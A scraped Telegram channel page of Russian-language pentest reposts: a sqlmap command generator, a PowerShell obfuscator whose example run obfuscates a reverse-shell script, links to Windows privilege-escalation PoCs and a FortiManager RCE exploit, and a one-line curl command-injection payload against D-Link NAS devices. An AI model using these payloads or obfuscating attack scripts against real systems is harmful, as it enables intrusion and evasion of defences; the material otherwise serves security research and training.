Fsecurity | HH
رفتن به کانال در Telegram
👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb
نمایش بیشتر2 063
مشترکین
+124 ساعت
-37 روز
-230 روز
آرشیو پست ها
2 062
Repost from Похек
From forgetful to forgetful (Part 2)
#forgetful2forgetful #sqlmap
🔺 cmd.poxek.cc 🔺
Когда-то я написал пост, который назвал from forgetful to forgetful. Смысл его был в том, что я постоянно забывал, как быстро установить и накатить свои настройки oh-my-zsh и тогда родился тот пост.
Этот же пост порождён был моим учеником с менторства, который постоянно забывает как корректно составлять команду перед её запуском. Поэтому данный проект по сути является интерактивным сайтов для генерации команды. На данный я сделал это только для sqlmap, далее планирую сделать для nmap. Инструменты выбираю по принципу, где много аргументов и где люди по моему опыту чаще всего факапят.
Сайт очень простой, его код будет доступен всегда на 📱 Github. Сайт написан на NextJS и всё. Только клиентская часть, без какого либо логгирования того, что вы вводите. Так что пользуйтесь с кайфом. Если будут предложения по коду, кидайте 📱 PR, обсудим.
кто-то скажет "о новый таргет" - я скажу "удачи")
Надеюсь проект будет полезен. Хороших выходных!
➡️ Ссылка на сайт: cmd.poxek.cc
📱 Github
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
2 062
Repost from Поросёнок Пётр
Вчера внезапно получаю такое письмо и моментально теряю навык сна. Всё потому, что я понятия не имею, о какой компании идет речь. Не знаю, какой именно у них случился инцидент, но точно понимаю, что это мой IP-адрес, который они нашли в логах аж с февраля! Я уже начал представлять, как буду составлять алиби и объяснять, что, вообще-то, ничего не делал и катался на сноуборде в это время 🤣
Но потом резко вспомнил, что занимался ресерчем в начале года. Много сканил. И, вероятнее всего, нашел их уязвимый сервис, но даже не знал, что у ребят есть bug bounty. Так баг и пролежал почти год, пока кто-то другой не зарепортил его. Но повезло, что это инцидент в формате bug bounty, а не в формате data breach 🙊
2 062
Repost from Proxy Bar
С днем рождения !!!!
Сегодня Proxy Bar исполняется 3 года
***
Много воды утекло, но вектор канала сохранился, изменения коснулись чата группы, а именно:
# был перестроен чат
# набралась команда админов (хорошие специалисты и прекрасные люди)
# В рамках чата начали формироваться конкурсы и авторские статьи (+ source code)
*
Ну и по поводу дня рождения хотим поделиться в Вами некоторыми нашими сервисами:
заходите на proxy-bar.org там есть краткое описание, из основного
это секция Soft, Send, Secnote, PrivateBin, Jabber (много кто просил) и библиотека
*
С праздником, и Вас и Нас ! 😜
*
Если Вам нравится то что мы делаем, Вы можете нас поддержать:
***
Donate:
Bitcoin bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
#lденьрождения #админы #всевсевсе
2 062
Repost from Proxy Bar
Шифруем payload с помощью алгоритма DFC (Decorrelated Fast Cipher)
*
WriteUP SourceCode Demo
2 062
Repost from Pentest HaT
🏃 psobf v1.0 Powershell Obfuscator
Инструмент для обфускации PoSh скриптов, написан на 🖼️ Go
Установка:
go install github.com/TaurusOmar/psobf@latest
Запуск:
psobf -i .\revsh.ps1 -o revsh_obf.ps1 -level 1
На вход подаем оригинальный скрипт, на выход получаем обфусцированный и указываем уровень обфускации, всего их 5
Примеры:
# Original
Write-Host "Hello, World!"
# Obfuscated level 1
$obfuscated = $([char[]]("`W`,`r`,`i`,`t`,`e`,`-`,`H`,`o`,`s`,`t`,` `,`"`,`H`,`e`,`l`,`l`,`o`,`,` `,`W`,`o`,`r`,`l`,`d`,`!`,`"`") -join ''); Invoke-Expression $obfuscated
# Original
Write-Host "Hello, World!"
# Obfuscated level 2
$obfuscated = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI=')); Invoke-Expression $obfuscated
# Original
Write-Host "Hello, World!"
# Obfuscated level 3
$e = [System.Convert]::FromBase64String('V3JpdGUtSG9zdCAiSGVsbG8sIFdvcmxkISI='); $obfuscated = [System.Text.Encoding]::UTF8.GetString($e); Invoke-Expression $obfuscated
# Original
Write-Host "Hello, World!"
# Obfuscated level 4
$compressed = 'H4sIAAAAAAAAC+NIzcnJVyjPL8pJUQQAlRmFGwwAAAA='; $bytes = [System.Convert]::FromBase64String($compressed); $stream = New-Object IO.MemoryStream(, $bytes); $decompressed = New-Object IO.Compression.GzipStream($stream, [IO.Compression.CompressionMode]::Decompress); $reader = New-Object IO.StreamReader($decompressed); $obfuscated = $reader.ReadToEnd(); Invoke-Expression $obfuscated
# Original
Write-Host "Hello, World!"
# Obfuscated level 5
$fragments = @(
'Write-',
'Output "',
'Hello,',
' Wo',
'rld!',
'"'
);
$script = $fragments -join '';
Invoke-Expression $script
🖥 Home
#soft #powershell #obfuscator #psobf
✈️ Pentest HaT 🎩2 062
Repost from RedTeam brazzers
Всем привет!
С каждым днем лица людей на улице все более сердитые и угрюмые, кое-где успел выпасть снег, а некогда теплые осенние вечера сменились тоскливыми снежными сумерками.
В такое время очень не хватает хорошего списка LPE эксплойтов под винду.
К великому сожалению, я не смог обнаружить актуальный поддерживаемый список сплойтов 2023-2024 годов, впрочем, благодаря каналу 1N73LL1G3NC3, который был предательски снесен администрацией Telegram, у меня получалось достаточно оперативно пополнять свой небольшой лист с гитхабовскими POC.
Поэтому я принял решение о создании своего списка с LPE сплойтами под винду. Получилось собрать практически все POCи, которые выходили с 2023 года.
Ознакомиться можно тут:
https://github.com/MzHmO/Exploit-Street
2 062
Repost from Ralf Hacker Channel
Очень хороший материал про Process Injection в Linux. С кодом, схемами и картами памяти)
https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection
#redteam #maldev
2 062
Repost from APT
🚨 Fortinet FortiManager Unauthenticated RCE (CVE-2024-47575)
The remote code execution vulnerability in FortiManager allows attackers to perform arbitrary operations by exploiting commands via the FGFM protocol, circumventing authentication. Referred to as FortiJump, this vulnerability provides unauthorized access to FortiManager, enabling control over FortiGate devices by taking advantage of insufficient security in command handling and device registration processes.
🛠 Affected Versions:
FortiManager 7.6.0 FortiManager 7.4.0 through 7.4.4 FortiManager 7.2.0 through 7.2.7 FortiManager 7.0.0 through 7.0.12 FortiManager 6.4.0 through 6.4.14 FortiManager 6.2.0 through 6.2.12 FortiManager Cloud 7.4.1 through 7.4.4 FortiManager Cloud 7.2.1 through 7.2.7 FortiManager Cloud 7.0.1 through 7.0.12 FortiManager Cloud 6.4🔗 Research: https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ 🔗 Source: https://github.com/watchtowrlabs/Fortijump-Exploit-CVE-2024-47575 #fortinet #fortimanager #fgfm #unauth #rce
2 062
Repost from AP Security
#pentest
Вопросник с ответами для веб-пентестеров
Вопросы разного уровня сложности для оценки своего уровня.
Открывается без задержек через мобильный браузер
2 062
🥷 Command injection в параметре
name для D-Link NAS
Неаутентифицированное удаленное выполнение кода в четырех различных сетевых устройствах хранения данных, более 60 000 из которых доступны из Интернета.
Настолько простой баг, который можно найти простым фаззингом:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
#pentest #bugbounty2 062
Repost from Ralf Hacker Channel
Попалась на глаза python версия шарповой утилиты Seatbelt
https://github.com/0xthirteen/Carseat
#git #pentest #ad
